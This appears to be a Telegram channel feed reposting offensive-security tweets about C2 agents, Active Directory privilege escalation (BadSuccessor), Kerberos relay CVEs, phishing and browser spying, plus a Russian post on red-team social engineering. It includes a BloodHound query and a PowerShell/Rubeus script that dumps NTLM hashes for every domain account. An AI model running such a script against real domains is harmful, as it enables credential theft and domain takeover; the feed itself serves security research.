😈 [ Matt Ehrnschwender @M_alphaaa ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
🔗 https://github.com/MythicAgents/tetanus
🐥 [ tweet ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
🔗 https://github.com/MythicAgents/tetanus
🐥 [ tweet ]
эх вот би все в мире переписать на раст 🦀 👍🏻 🦀 👍🏻😁13🍌3👍2
😈 [ Steve S. @0xTriboulet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
🔗 https://github.com/0xTriboulet/rssh-rs
🐥 [ tweet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
🔗 https://github.com/0xTriboulet/rssh-rs
🐥 [ tweet ]
👍1
😈 [ Yehuda Smirnov @yudasm_ ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
🐥 [ tweet ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
🐥 [ tweet ]
🔥9🥱2👍1
😈 [ Yuval Gordon @YuG0rd ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🔥9
Offensive Xwitter
😈 [ Yuval Gordon @YuG0rd ] 🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it…
😈 [ Bad Sector Labs @badsectorlabs ]
If this query hits, you're in.
🐥 [ tweet ][ quote ]
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.nameIf this query hits, you're in.
🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
🔥6👍3🥱2
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
какой же разъеб 😂🤣upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
👍6🔥6
😈 [ Fabian @testert01 ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/
🐥 [ tweet ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/
🐥 [ tweet ]
👍6
😈 [ mr.d0x @mrd0x ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/
🐥 [ tweet ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/
🐥 [ tweet ]
👍7🥱4
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ James Woolley @Xtrato ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆
🐥 [ tweet ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆
🐥 [ tweet ]
🥱20🍌7👍5😁3🤯1
😈 [ RedTeam Pentesting @RedTeamPT ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:
🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
🐥 [ tweet ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:
🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
🐥 [ tweet ]
🔥11
😈 [ Synacktiv @Synacktiv ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
🐥 [ tweet ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
🐥 [ tweet ]
🥱8👍4
😈 [ Praetorian @praetorianlabs ]
🚨 New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
📖 Blog covers methodology, red team case studies & detection strategies
🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/
🐥 [ tweet ]
🚨 New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
📖 Blog covers methodology, red team case studies & detection strategies
🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/
🐥 [ tweet ]
🔥7
😈 [ Jonathan Beierle @hullabrian ]
I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.
🔗 https://github.com/HullaBrian/COMmander
🐥 [ tweet ]
I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.
🔗 https://github.com/HullaBrian/COMmander
🐥 [ tweet ]
🔥4👍1
Forwarded from Positive Technologies
Как ребята готовились и проводили атаки при помощи социальной инженерии, что из этого вышло и чем помогло клиентам, подробно рассказал в своей статье для Positive Research Константин Полишин, руководитель группы Red Team SE отдела тестирования на проникновение Positive Technologies.
Вы удивитесь, как много можно узнать о компании, применяя лишь методы пассивной разведки. Например, используемый стек технологий легко находится в вакансиях для айтишников и резюме сотрудников. А корпоративные адреса — в публичных утечках данных и логах инфостилеров. А уж если искать информацию активно — можно собрать из разных источников целые досье на предполагаемых жертв.
🎣 Дальше остается тщательно подобрать фокус-группу, разработать фишинговый сценарий и раз за разом забрасывать удочку, пока не сработает. Для этого редтимеры (как и предполагаемые злоумышленники) тщательно изучают содержимое почтовых ящиков, ключевые слова в письмах, корпоративный стиль общения, внутреннюю жизнь и процессы в компании.
#PositiveResearch
@Positive_Technologies
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🍌4